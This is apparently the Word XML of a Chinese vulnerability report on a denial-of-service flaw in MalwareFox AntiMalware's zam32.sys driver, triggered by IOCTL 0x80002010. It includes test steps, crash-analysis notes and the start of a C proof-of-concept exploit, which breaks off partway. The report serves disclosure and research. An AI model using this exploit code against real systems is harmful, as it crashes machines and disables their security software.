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C0" w:rsidRDefault="003D7299" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D7299">
        <w:t>MalwareFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D7299">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D7299">
        <w:t>AntiMalware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0065357F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32</w:t>
      </w:r>
      <w:r w:rsidR="0065357F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r w:rsidR="00050716">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件驱动存在</w:t>
      </w:r>
      <w:r w:rsidR="00A46FBF" w:rsidRPr="00A46FBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C"/>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件名称：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00402C05" w:rsidRPr="00402C05">
        <w:t>MalwareFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00402C05" w:rsidRPr="00402C05">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00402C05" w:rsidRPr="00402C05">
        <w:t>AntiMalware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00402C05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00203F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidR="00203F0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本号：</w:t>
      </w:r>
      <w:r w:rsidR="00462E9F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="0092476C" w:rsidRPr="0092476C">
        <w:t>2.74.206.150</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004178BF" w:rsidRPr="004178BF" w:rsidRDefault="004178BF" w:rsidP="004178BF">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>测试环境</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7 32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载链接：</w:t>
      </w:r>
      <w:r w:rsidR="00D11136" w:rsidRPr="00D11136">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>https://www.malwarefox.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在漏洞驱动名称：</w:t>
      </w:r>
      <w:r w:rsidR="00B4129C" w:rsidRPr="00B4129C">
        <w:t>zam32.sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在漏洞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BB657E" w:rsidRPr="00BB657E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001639CF" w:rsidRPr="001639CF">
        <w:t>0x80002010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00002BCE" w:rsidRDefault="005736A9" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00002BCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试条件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA1A3A" w:rsidRDefault="00FA1A3A" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B6489E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下图所示，打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A2E0E" w:rsidRPr="007A2E0E">
        <w:t>MalwareFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A2E0E" w:rsidRPr="007A2E0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A2E0E" w:rsidRPr="007A2E0E">
        <w:t>AntiMalware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B6489E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
      <w:r w:rsidR="00F12A3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D17C19">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再点击运行</w:t>
      </w:r>
      <w:r w:rsidR="00A62FB1" w:rsidRPr="00A62FB1">
        <w:t>0x80002010</w:t>
      </w:r>
      <w:r w:rsidR="00D17C19" w:rsidRPr="00D17C19">
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidR="00D17C19">
        <w:t>程序</w:t>
      </w:r>
      <w:r w:rsidR="007C795B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007C795B">
        <w:t>回车</w:t>
      </w:r>
      <w:r w:rsidR="00D17C19">
        <w:t>即可</w:t>
      </w:r>
      <w:r w:rsidR="005E1BE9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00002BCE" w:rsidRDefault="00002BCE" w:rsidP="006B436C"/>
    <w:p w:rsidR="00B6489E" w:rsidRDefault="00327107" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3279212"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="F:\download_chrome\antivirus\MalwareFox\0x80002010\tri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_chrome\antivirus\MalwareFox\0x80002010\trige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9E" w:rsidRDefault="00B6489E" w:rsidP="006B436C"/>
    <w:p w:rsidR="006B436C" w:rsidRDefault="008D1E1E" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="006B436C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r w:rsidR="00050716">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00050716">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00050716">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> !analyze </w:t>
      </w:r>
      <w:r w:rsidR="00050716">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00050716">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截图</w:t>
      </w:r>
      <w:r w:rsidR="006B436C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00050716" w:rsidRDefault="00CD1A4E" w:rsidP="006B436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760845" cy="5888355"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="F:\download_chrome\antivirus\MalwareFox\0x80002054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wnload_chrome\antivirus\MalwareFox\0x80002054\1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45785" cy="5209540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="F:\download_chrome\antivirus\MalwareFox\0x80002054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wnload_chrome\antivirus\MalwareFox\0x80002054\1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ECD" w:rsidRDefault="00225ECD" w:rsidP="006B436C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040715B" w:rsidRDefault="0040715B" w:rsidP="006B436C">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040715B" w:rsidRDefault="00756482" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>图中可见出现</w:t>
      </w:r>
      <w:r w:rsidR="006A5728">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访存错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF373B" w:rsidRDefault="000D665B" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>蓝屏截图：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF373B" w:rsidRDefault="008770AE" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00327107">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3975442"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="5" name="图片 5" descr="F:\download_chrome\antivirus\MalwareFox\0x80002010\bs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_chrome\antivirus\MalwareFox\0x80002010\bso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3B" w:rsidRDefault="00BF373B" w:rsidP="00BF373B">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF373B" w:rsidRDefault="00BF373B" w:rsidP="00BF373B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试的环境是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win 7 32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BF373B" w:rsidRPr="00BF373B" w:rsidRDefault="00BF373B" w:rsidP="00BF373B"/>
    <w:p w:rsidR="00BF373B" w:rsidRDefault="00BF373B" w:rsidP="00BF373B">
      <w:r w:rsidRPr="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发漏洞的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO code</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="007434CE" w:rsidRPr="007434CE">
        <w:t>0x80002010</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，函数存在于驱动的</w:t>
      </w:r>
      <w:r w:rsidR="00BD274D" w:rsidRPr="00BD274D">
        <w:t>sub_</w:t>
      </w:r>
      <w:r w:rsidR="008A0867">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DD90</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r w:rsidR="00B74BAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传入空数据之后，出现访存错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF373B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E05784" w:rsidRDefault="008A0867" w:rsidP="00BF373B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3837940" cy="1378585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="F:\download_chrome\antivirus\MalwareFox\0x80002054\vul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wnload_chrome\antivirus\MalwareFox\0x80002054\vul_1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673985" cy="4641215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="12" name="图片 12" descr="F:\download_chrome\antivirus\MalwareFox\0x80002054\vul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wnload_chrome\antivirus\MalwareFox\0x80002054\vul_1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34" w:rsidRDefault="00624034" w:rsidP="00BF373B"/>
    <w:p w:rsidR="004E535E" w:rsidRDefault="004E535E" w:rsidP="00BF373B"/>
    <w:p w:rsidR="00BF373B" w:rsidRPr="00BF373B" w:rsidRDefault="00BF373B" w:rsidP="00BF373B"/>
    <w:p w:rsidR="006B436C" w:rsidRPr="006B436C" w:rsidRDefault="006B436C" w:rsidP="006B436C"/>
    <w:p w:rsidR="006B436C" w:rsidRDefault="00641695" w:rsidP="006B436C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终的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代码如下</w:t>
      </w:r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1695" w:rsidTr="00641695">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"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3633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:t>#include&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Windows.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:t>// Gives the error message corresponding to a given Win32 error code ----------</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:t xml:space="preserve">char *errorCode2String(DWORD </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">LPVOID </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lpMsgBuf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>FormatMessage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>FORMAT_MESSAGE_ALLOCATE_BUFFER |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>FORMAT_MESSAGE_FROM_SYSTEM |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>FORMAT_MESSAGE_IGNORE_INSERTS,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode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MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>(LPTSTR)&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lpMsgBuf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0, NULL);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>return (char*)</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lpMsgBuf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>int</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> main()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">LPCWSTR </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lpDeviceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">HANDLE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceHandle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">char   </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[100] = "\\\\.\\ZemanaAntiMalware";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">DWORD  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>IoctlCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0x80002010;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t>DWORD  status;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">DWORD  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nbBytes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">BYTE  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brutebufInput</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[0x10000];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">BYTE  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>brutebufOutput</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[0x10000];</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"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3633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve">WCHAR </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wsz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>[100] = { 0 };</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MultiByteToWideChar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(CP_ACP, 0, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">,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deviceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">) + 1, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wsz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, 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wsz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>));</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lpDeviceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>wsz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"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[~] Open handle to the device %s ...\n", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD"/>
          <w:p w:rsidR="003633AD" w:rsidRDefault="003633AD" w:rsidP="003633AD">
            <w:r>
              <w:tab/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>deviceHandle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
